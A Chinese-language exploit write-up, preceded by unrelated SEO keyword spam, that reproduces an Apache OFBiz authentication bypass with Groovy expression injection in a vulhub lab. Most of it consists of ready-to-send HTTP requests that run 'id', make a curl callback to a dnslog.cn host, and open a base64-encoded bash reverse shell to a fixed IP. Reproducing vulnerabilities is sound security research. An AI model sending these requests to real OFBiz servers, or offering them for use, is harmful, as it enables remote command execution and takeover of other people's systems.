网站留言怎么做,公司注册网上核名入口,湖南省城乡与住房建设厅网站,天津网络优化网站建设漏洞名称
Apache OFBiz 鉴权绕过导致命令执行
漏洞描述
Apache OFBiz是一个非常著名的电子商务平台#xff0c;是一个非常著名的开源项目#xff0c;提供了创建基于最新J2EE/XML规范和技术标准#xff0c;构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式…漏洞名称
Apache OFBiz 鉴权绕过导致命令执行
漏洞描述
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 这个漏洞的原因是对于CVE-2023-49070的不完全修复。在Apache OFBiz 18.12.10版本中官方移除了可能导致RCE漏洞的XMLRPC组件但没有修复权限绕过问题。来自长亭科技的安全研究员枇杷哥利用这一点找到了另一个可以导致RCE的方法Groovy表达式注入。
影响版本
Apache OFBiz 18.12.11
漏洞复现
使用vulhub的环境复现 访问登录界面https://your-ip:8443/accounting/control/main
exp
直接发送如下请求即可使用Groovy脚本执行id命令有回显
POST /webtools/control/ProgramExport/?USERNAMEPASSWORDrequirePasswordChangeY HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55groovyProgramthrownewException(id.execute().text);dnslog验证
POST /webtools/control/ProgramExport/?USERNAMEPASSWORDrequirePasswordChangeY HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 48groovyProgramcurl8pjgnx.dnslog.cn.execute();反弹shell
POST /webtools/control/ProgramExport/?USERNAMEPASSWORDrequirePasswordChangeY HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71groovyProgrambash-c{echo,YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzQ0MyAwPiYx}|{base64,-d}|{bash,-i}.execute();反弹成功